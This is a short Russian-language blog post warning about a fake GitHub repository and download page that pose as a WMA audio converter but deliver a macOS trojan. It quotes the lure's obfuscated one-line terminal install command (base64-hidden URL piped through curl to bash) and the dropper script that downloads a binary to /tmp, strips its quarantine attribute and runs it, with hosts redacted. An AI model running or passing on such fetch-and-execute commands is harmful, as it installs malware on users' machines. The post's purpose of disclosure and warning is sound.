Понадобилось мне на днях конвертировать несколько WMA-файлов во что-то воспроизводимое на iPad.

В результатах поиска буквально на третьей строчке оказалась ссылка на репозиторий GitHub. Оформлено всё красиво, по описанию - ровно то, что нужно:

При переходе по приведённой ссылке оказываешься на не менее качественно проработанной странице: валидный SSL-сертификат, логотип GitHub, “Verified Publisher” и проч.

Да вот только скачивается вместо ожидаемого полезной утилиты - троян:

Не выяснял, идёт ли в дополнение к трояну полезная нагрузка в виде реально работающего конвертера, воспользовался другим работающим чистым вариантом: MediaHuman Audio Converter.

Из интересного - в качестве альтернативы скачивания .dmg-файла страница загрузки предлагает вариант установки через терминал нехитрой командой вида:

/bin/bash -c "$(curl -fsSL $(echo aHR0aHR0XXXXXXXXXXXXXXXXXXXXXzaA== | base64 -d))"

Команда echo -n 'aHR0XXXXXXXXXXXXXXXXXXXXXzaA==' | base64 --d декодирует нечитаемую последовательность символов в ссылку для скачивания скрипта: https://XXXXXXXXXXXXXXXXXXXXX.com/get1/install.sh, который в свою очередь подтягивает основное тело трояна. Содержимое файла install.sh:

#!/bin/bash
curl -o /tmp/update https://XXXXXXXXXXXXXXXXXXXXX.com/get1/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update

Просто и со вкусом.

По понятным соображениям реальные адреса и названия заменены на XXXXXXXXXXXXXXXXXXXXX и заблюрены.

Жалобу в GitHub отправил - это можно сделать по ссылке вида: https://github.com/contact/report-abuse?report=YYYYYY, где YYYYYY - имя пользователя GitHub.

К слову, жаль, что полезная инициатива «Национальный мультисканер» не проработала и года =( Вздыхаем с грустью и продолжаем использовать https://www.virustotal.com

И, да, я не настоящий malware-аналитик - всю глубину глубин принципов загрузки трояна мог не до конца понять =)